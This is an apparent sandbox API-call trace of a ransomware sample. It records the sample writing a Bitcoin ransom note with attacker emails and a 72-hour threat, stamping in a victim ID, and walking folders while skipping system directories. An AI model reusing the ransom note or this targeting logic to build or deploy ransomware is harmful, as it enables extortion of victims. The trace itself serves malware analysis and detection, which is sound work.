	[0177.607] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.607] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.611] CloseHandle (hObject=0x388) returned 1
	[0177.612] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.612] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.612] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0177.613] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.613] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.614] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.614] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.614] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0177.614] CloseHandle (hObject=0x388) returned 1
	[0177.614] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.615] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.615] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.615] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\HELP_DECRYPT_YOUR_FILES.HTML") returned 73
	[0177.615] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.616] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.616] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0177.618] CloseHandle (hObject=0x388) returned 1
	[0177.619] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.619] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.626] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.626] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0177.627] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.627] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.627] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.627] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.628] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0177.628] CloseHandle (hObject=0x388) returned 1
	[0177.628] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x836508e4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.628] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*") returned 48
	[0177.628] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.629] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*", cchLength=0x30 | out: lpsz="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*") returned 0x30
	[0177.629] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.629] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="windows") returned 0x0
	[0177.629] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.629] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="boot") returned 0x0
	[0177.629] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.629] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="system volume information") returned 0x0
	[0177.630] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.630] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.630] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.630] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="temp") returned 0x0
	[0177.630] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.630] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="program files") returned 0x0
	[0177.630] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.630] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.631] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="appdata") returned 0x0
	[0177.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.631] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="application data") returned 0x0
	[0177.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.631] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="winnt") returned 0x0
	[0177.631] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="tmp") returned 0x0
	[0177.632] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="cache") returned 0x0
	[0177.632] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.632] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.632] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="webcache") returned 0x0
	[0177.633] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.633] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="inetcache") returned 0x0
	[0177.633] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.633] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="nvidia") returned 0x0
	[0177.633] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.633] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="packages") returned 0x0
	[0177.633] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.633] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="cookies") returned 0x0
	[0177.634] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.634] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="programdata") returned 0x0
	[0177.634] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.634] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.634] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x836508e4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.634] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.634] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x836508e4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x836508e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83676c24, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.634] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x836508e4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x836508e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x836508e4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.634] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x836508e4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x836508e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x836508e4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0177.635] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.635] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.636] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0
	[0177.637] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.637] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.637] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1
	[0177.637] lstrcmpW (lpString1="WwanSvc", lpString2="..") returned 1
	[0177.637] lstrcmpW (lpString1="WwanSvc", lpString2=".") returned 1
	[0177.637] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.638] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.638] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="WwanSvc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc"
	[0177.638] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc"
	[0177.638] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\"
	[0177.638] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\"
	[0177.638] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*"
	[0177.638] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.639] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned 40
	[0177.639] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.639] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\wwansvc\\*.*") returned 0x28
	[0177.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.639] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="windows") returned 0x0
	[0177.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.639] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="boot") returned 0x0
	[0177.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="system volume information") returned 0x0
	[0177.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="temp") returned 0x0
	[0177.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="program files") returned 0x0
	[0177.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="appdata") returned 0x0
	[0177.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="application data") returned 0x0
	[0177.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="winnt") returned 0x0
	[0177.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="tmp") returned 0x0
	[0177.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="cache") returned 0x0
	[0177.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="webcache") returned 0x0
	[0177.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="inetcache") returned 0x0
	[0177.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="nvidia") returned 0x0
	[0177.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="packages") returned 0x0
	[0177.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="cookies") returned 0x0
	[0177.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.644] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wwansvc\\*.*", lpSrch="programdata") returned 0x0
	[0177.644] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.644] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMProfiles", cAlternateFileName="DMPROF~1")) returned 1
	[0177.644] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1
	[0177.644] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 0
	[0177.644] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.644] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.645] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc"
	[0177.645] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*"
	[0177.645] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.645] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.645] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\WwanSvc\\HELP_DECRYPT_YOUR_FILES.TXT") returned 64
	[0177.646] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
